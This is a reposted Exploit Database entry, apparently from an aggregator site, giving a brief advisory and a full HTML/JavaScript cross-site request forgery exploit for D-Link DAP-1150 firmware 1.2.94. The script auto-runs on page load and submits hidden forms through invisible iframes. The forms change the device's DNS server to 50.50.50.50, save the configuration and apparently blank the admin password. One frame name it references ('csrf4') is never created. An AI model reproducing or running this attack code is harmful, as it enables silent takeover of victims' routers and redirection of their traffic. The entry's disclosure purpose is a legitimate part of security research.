D-Link DAP-1150 1.2.94 – Cross-Site Request Forgery

• Exploit Database
• 11 阅读

• 作者： MustLive
  日期： 2012-02-13
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/36767/

• source: https://www.securityfocus.com/bid/51985/info
  
  D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability.
  
  Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.
  
  D-Link DAP-1150 firmware version 1.2.94 is vulnerable; other versions may also be affected. 
  
  <html>
  <head>
  <title>Exploit for D-Link DAP 1150. Made by MustLive.
  http://websecurity.com.ua</title>
  </head>
  <body onLoad="StartCSRF()">
  <script>
  function StartCSRF() {
  for (var i=1;i<=3;i++) {
  var ifr = document.createElement("iframe");
  ifr.setAttribute(&#039;name&#039;, &#039;csrf&#039;+i);
  ifr.setAttribute(&#039;width&#039;, &#039;0&#039;);
  ifr.setAttribute(&#039;height&#039;, &#039;0&#039;);
  document.body.appendChild(ifr);
  }
  CSRF1();
  setTimeout(CSRF2,1000);
  setTimeout(CSRF3,2000);
  }
  function CSRF1() {
  window.frames["csrf3"].document.body.innerHTML = &#039;<form name="hack"
  action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
  name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
  type="hidden" name="res_json" value="y">\n<input type="hidden"
  name="res_data_type" value="json">\n<input type="hidden"
  name="res_config_action" value="3">\n<input type="hidden"
  name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size"
  value="0">\n<input type="hidden" name="res_buf"
  value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>&#039;;
  window.frames["csrf3"].document.hack.submit();
  }
  function CSRF2() {
  window.frames["csrf4"].document.body.innerHTML = &#039;<form name="hack"
  action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
  name="res_cmd" value="20">\n<input type="hidden" name="res_buf"
  value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input
  type="hidden" name="v2" value="y">\n<input type="hidden" name="rq"
  value="y">\n</form>&#039;;
  window.frames["csrf4"].document.hack.submit();
  }
  function CSRF3() {
  window.frames["csrf2"].document.body.innerHTML = &#039;<form name="hack"
  action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
  name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
  type="hidden" name="res_config_action" value="3">\n<input type="hidden"
  name="res_config_id" value="69">\n<input type="hidden"
  name="res_struct_size" value="1">\n<input type="hidden" name="res_buf"
  value="password|">\n</form>&#039;;
  window.frames["csrf2"].document.hack.submit();
  }
  </script>
  </body>
  </html>